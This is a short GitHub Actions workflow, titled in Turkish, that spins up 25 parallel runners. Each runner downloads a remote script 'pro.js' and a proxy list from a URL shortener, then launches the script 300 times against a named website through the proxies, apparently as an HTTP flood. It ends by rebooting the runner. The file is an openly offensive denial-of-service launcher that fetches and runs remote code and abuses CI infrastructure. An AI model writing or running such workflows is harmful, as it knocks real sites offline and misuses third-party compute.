name: Ubuntu VDS 50 saniye pro.j

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          wget https://curl.by/IWejc/pro.js
          wget https://curl.by/HStFe/proxies.txt
          npm i hpack
          chmod +x pro.js
          PIDS=()
          for i in {1..300}; do
            timeout 84 node pro.js GET https://hexbear.xyz/ 85 24 90 proxies.txt --full
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 84
        
      - name: OK !
        run: sudo reboot
